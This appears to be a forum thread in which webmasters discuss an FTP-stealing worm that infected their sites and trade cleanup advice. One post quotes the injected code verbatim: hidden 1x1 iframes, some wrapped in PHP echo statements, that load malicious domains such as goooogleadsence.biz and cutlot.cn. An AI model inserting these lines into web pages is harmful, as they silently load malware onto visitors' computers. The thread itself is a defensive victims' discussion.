Thread: Net Builders SEO Contest

Originally Posted by DomainMagnate

Hellas, what does the worm do?

First your pc get infected. Then it watchs for your username and pass for ftp (i believe when you initiate connection then it get it, not by type in).
Then it add few lines to every file on server that contain in name index, main
but I found it in some unrelated files. That files are pointed to some chinese or another sites ads or something not sure.

Here is the lines it add:

echo "<iframe src=\"http://goooogleadsence.biz/?click=B16BFB\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://google-ana1yticz.com/?click=38951B\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

and another one
<iframe src="http://cutlot.cn/in.cgi?income49" width=1 height=1 style="visibility: hidden"></iframe>

I have one big site with over 600 index files, and I am still finding the way for removing them all. Wordpress sites are very easy to clean, but I noticed it infect few other site not just index. Some guys on joomla are selling removal tools. My Clam antivirus detects all on server but it can not repair files, just delete them, so you need to manualy remove those.

And it looks like permissions did not stop him. Every file that I (my ftp user) had right to write, are infected.

Bad thing is if you dont react google wil designate your site as "This site can harm your computer". You can imagine what that would do to your site traffic.

I'm fed cleaning them. It has infected most of my sites. And looks like.. the only job is to clean clean clean.. damn.. leave everything and clean this..

Originally Posted by Hellas

today 5 of my sites got infected by iframe ftp worm
and among them sulumits retsambew
I changed all my passwords and cleaned almost all...
lost over 7 hours to fix them all...

I see Sunitas entry is still infected. This worm is madness. I would strangle the guy who made it even if know that I am the guilty the most for not be more carefull.
I was lucky to notice almost imediatly that something is wrong...

Afzal it was some other directories I will check it when I log back to windows.
But I think it were regular directories...

ouch! Well I usually just roll back the previous backup when the sites get hacked.

Originally Posted by ChillingBreeze

I'm fed cleaning them. It has infected most of my sites. And looks like.. the only job is to clean clean clean.. damn.. leave everything and clean this..

You need to clean your pc first then change all passwords then bring back your backups.
There is no point to recover if you did not change backup it will just infect everything again.

Originally Posted by DomainMagnate

ouch! Well I usually just roll back the previous backup when the sites get hacked.

That is what I did in small cases.




Also strange thing is that I dont use FTP so often. But I use FTP layers in my PHP applications... So thats why I am worried that it can watch for everything typed in.
So I changed all my system passwords.

And as I said I was lucky to notice almost immediaty. My friend contacted me and said he is getting unusual warnings and just little bit earlier everything worked.

I now work from my Mandriva installation, dont trust the XP + NOD 32. However NOD 32 noticed me and I mistakenly clicked close instead of terminate.

Also this thing works only on some browsers

IE FIREFOX and OPERA it looks it cant infect Chrome.

You could use a sed along with find to remove all instances of those lines in a whole directory structure if you have access to run sed/find (shell)

What browser did you use to open the infected site and what anti-virus are you running?

My sulumits retsambew blog is lucky that it has not been affected by any virus. My wordpress blog also got suspended.

Originally Posted by sulumits competitior

My sulumits retsambew blog is lucky that it has not been affected by any virus. My wordpress blog also got suspended.

Mr. Sulumits Retsambew has made it's way to the first page finally.

Originally Posted by nux

You could use a sed along with find to remove all instances of those lines in a whole directory structure if you have access to run sed/find (shell)

I used clam antivirus to locate all instances then manuly removed them...

here is my article about this pest
hope it will get some traffic

iFrame worms: goooogleadsence.biz, cutlot.cn, google-ana1yticz.com, mixante.cn and similar | Sulumits Retsambew